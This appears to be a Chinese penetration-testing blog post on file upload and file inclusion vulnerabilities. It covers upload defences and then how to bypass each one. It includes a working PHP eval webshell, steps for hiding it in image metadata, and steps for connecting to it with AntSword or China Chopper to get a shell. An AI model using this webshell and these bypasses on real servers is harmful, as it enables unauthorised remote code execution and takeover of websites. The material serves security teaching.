文件上传漏洞(webshell)和文件包含漏洞

一、防护

1、防护

1、判断文件后缀,为图片的话才让上传成功。

2、解析文件内容(文件幻数)判断文件头和文件尾部是否一致
幻数
常见的

3、隐藏按钮(带上code唯一值)

4、二次渲染(类似拿着你的图片,我再拿手机在你的图片上拍上一张),删除缓存图片

5、文件重命名,避免从客户端拿取更多信息


2、绕过

1、文件后缀不一定非得是php结尾,也可以php5等等

调用示例

2、文件头检测(幻数)绕过

存在一种可以将php等等文件转换成png的方法

或者右键===》属性====》查看详情====》修改版权===》粘贴你的脚本即可(ps:需要在小马基础上加东西)

下面为小马

实际上存到jpg版权中的为

php 复制代码
<?php phpinfo();@eval($_REQUEST[777])?>

注意如果.../路径被过滤了可以使用.../

需要配合其他漏洞比如包含漏洞(比如php页面需要复用其他代码的时候,这个时候路径地址填写图片即可)

使用菜刀连接即可地址为包含php包含漏洞的地址
ps:如果不能菜刀直接连接的话,可以使用图片脚本生成脚本文件来连

3、隐藏按钮唯一值

抓包拦截修改参数就行

4、二次渲染

最后面的一句话

二、文件上传漏洞

可以通过判断系统上有什么环境,比如php和.net或者java等,上传对应webshell的文件,从而获取服务器一部分权限

webshell获取途径可以从GitHub上找到:::webshell

1、小马(一句话脚本)

需要上传后,使用中国蚁剑(antsword)配合着使用

  1. 打开中国中国蚁剑

  2. 右键添加数据 指定对应的小马文件

  3. 输入密码

  4. 右键点击打开终端

2、大马

无需使用中国蚁剑,打开web页面即可有对映执行页面。

相关推荐
合作小小程序员小小店4 小时前
Web渗透之一句话木马
web安全·网络安全·安全威胁分析·安全架构·安全性测试
white-persist5 小时前
Burp Suite模拟器抓包全攻略
前端·网络·安全·web安全·notepad++·原型模式
网安小白的进阶之路11 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-3
网络·安全·web安全
独行soc1 天前
2025年渗透测试面试题总结-102(题目+回答)
网络·安全·web安全·网络安全·adb·渗透测试·安全狮
key061 天前
网络安全等级保护测评实施过程
数据库·安全·web安全·安全合规
余防1 天前
bypass--绕Waf
安全·web安全·网络安全
独行soc1 天前
2025年渗透测试面试题总结-101(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
云安全联盟大中华区1 天前
以美为鉴:构建现代化的核能行业网络安全合规体系--为人工智能革命提供动力
人工智能·安全·web安全
lingggggaaaa2 天前
小迪安全v2023学习笔记(九十五讲)—— 云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载
笔记·学习·安全·web安全·网络安全·docker·云原生
德迅云安全杨德俊2 天前
SCDN-保护网站安全的有效方案
网络·安全·web安全·ddos